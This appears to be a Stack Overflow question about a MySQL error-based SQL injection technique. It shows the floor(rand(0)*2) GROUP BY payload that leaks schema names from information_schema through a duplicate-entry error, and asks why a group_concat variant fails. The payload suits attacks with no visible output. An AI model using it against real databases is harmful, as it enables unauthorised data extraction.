1

When I try to use the sql error injection of some no-echo situation,i find it works, when i use group_concat in my query,but it should be a error so that i can get the error information.

The correct usage is:

select count(*),
       concat(
          (SELECT schema_name FROM information_schema.schemata limit 0,1)
          ,  
          floor(rand(0)*2) 
       ) x 
from information_schema.tables 
group by x

It returns :

Duplicate entry 'information schema' for key 'group key

But I want to query all at one time. So i use:

select count(*),
       concat(
         (SELECT group_concat(schema_name) FROM information_schema.schemata)
         ,  
         floor(rand(0)*2) 
       ) x 
from information_schema.tables 
group by x

but it doesn't return error. enter image description here So why? I am grateful for your help

thinksoso
  • 13
  • 4
  • Post some sample data with expected output. – mkRabbani Aug 14 '19 at 06:05
  • Welcome to SO! In its current state, it's hard to tell what your *exact* question is. Please [edit] your question and add a tag for the RDBMS you're using, sample input and expected output. Apart from that: This doesn't look like a question about SQL injection. What exactly are you trying to achieve? – Frank Schmitt Aug 14 '19 at 06:14
  • Interesting question. You are saying that an aggregation query is allowed for a `group by` key, but a non-aggregation query is not. I am surprised that it is allowed. – Gordon Linoff Aug 14 '19 at 12:01
  • because the floor(rand(0)*2) can be 0 or 1,it is a useful tool in blind sql injection – thinksoso Aug 14 '19 at 15:56

0 Answers0